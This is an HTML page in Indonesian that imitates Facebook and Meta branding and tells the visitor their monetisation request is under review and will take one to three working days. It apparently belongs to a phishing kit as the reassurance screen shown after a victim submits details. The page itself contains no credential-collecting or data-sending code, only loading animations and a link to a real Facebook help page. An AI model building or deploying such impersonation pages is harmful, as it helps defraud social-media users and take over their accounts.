<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    />

    <!-- Bootstrap CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
      crossorigin="anonymous"
    />
    <link rel="shortcut icon" href="assets/img/favfb.png" type="image/x-icon">
    <link rel="stylesheet" href="assets/wahyustore.css" />
    <title>Masuk | Masuk Facebook</title>
    <style>
        

        .bounce {
            width: 200px; /* Ukuran gambar */
            height: auto;
            animation: bounce 2s infinite; /* Efek bounce */
        }

        /* Keyframes untuk bounce */
        @keyframes bounce {
            0%, 100% {
                transform: translateY(0); /* Posisi awal */
            }
            50% {
                transform: translateY(-30px); /* Melompat ke atas */
            }
        /* Layer loading */
    .loading-overlay {
      position: fixed; /* Menutupi layar penuh */
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.7); /* Warna hitam transparan */
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999; /* Prioritas tertinggi */
    }

    .loading-overlay.hidden {
      display: none; /* Tersembunyi secara default */
    }

    .spinner {
      width: 50px;
      height: 50px;
      border: 5px solid rgba(255, 255, 255, 0.3); /* Border transparan */
      border-top-color: white; /* Bagian atas putih */
      border-radius: 50%; /* Membuat lingkaran */
      animation: spin 1s linear infinite; /* Efek rotasi */
    }

    @keyframes spin {
      from {
        transform: rotate(0deg);
      }
      to {
        transform: rotate(360deg);
      }
    }

    /* Konten Utama */
    .content {
      padding: 20px;
      text-align: center;
    }
  </style>
  </head>
  <body>
      <!-- Layer Loading -->
  <div class="loading-overlay" id="loadingOverlay">
    <div class="spinner"></div>
  </div>
    <div class="container">
      <header>
        <nav>
          <div>
            <img src="img/logometa.png" width="30%" alt="Facebook Logo" />
          </div>
          <ul class="menu">
            <li><a href="#">Bantuan</a></li>
          </ul>
        </nav>
      </header>
      <div class="row1">
        <center>
          <img src="https://media.tenor.com/nEoz_3Q6_1YAAAAj/hourglass-time.gif" width="15%" alt="Facebook open" />

          <h3 class="formh3">Pengajuan Monetisasi sedang Ditinjau</h3>
        </center><br>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDisabled" id="flexRadioDisabled" disabled>
          <label class="form-check-label" for="flexRadioDesabled">
            Pengajuan
          </label>
        </div>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDefault" id="flexRadioDefault2" checked>
          <label class="form-check-label" for="flexRadioDefault1">
            sedang ditinjau
          </label>
          <p class="loading" id="loading">akun anda akan diperiksa untuk memastikan bahwa Konten anda layak untuk dimonetisasi kembali, proses ini butuh waktu 1-3 hari kerja</p>

    <script>
        const loadingText = document.getElementById('loading');
        let dots = 0;

        setInterval(() => {
            dots = (dots + 1) % 4; // Mengulang dari 0 sampai 3
            loadingText.textContent = 'akun anda akan diperiksa untuk memastikan bahwa Konten anda layak untuk dimonetisasi kembali, proses ini butuh waktu 1-3 hari kerja' + '.'.repeat(dots);
        }, 500);
    </script>
        </div>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDisabled"
          id="flexRadioDisabled" disabled>
          <label class="form-check-label" for="flexRadioDefault1">
            Selesai
          </label>
          
        </div>
      <footer>
        <a href="https://web.facebook.com/business/help/1979171292197867" type="button" class="btn btn-primary">Tutup Halaman ini</a>
      </footer>
    </div>
    <script
      src="https://kit.fontawesome.com/08380760ee.js"
      crossorigin="anonymous"
    ></script>
    <script>
    const loadingOverlay = document.getElementById("loadingOverlay");

    // Fungsi untuk menampilkan loading dan mengatur waktu otomatis hilang
    function showLoading() {
      loadingOverlay.classList.remove("hidden"); // Menampilkan layer loading

      // Mengatur timer untuk menyembunyikan loading setelah 3 detik
      setTimeout(() => {
        loadingOverlay.classList.add("hidden");
      }, 3000); // 3000ms = 3 detik
    }

    // Menampilkan loading secara otomatis saat halaman dimuat (opsional)
    window.addEventListener("load", () => {
      setTimeout(() => {
        loadingOverlay.classList.add("hidden");
      }, 3000); // Layer loading hilang setelah 3 detik
    });
  </script>
    
  </body>
</html>
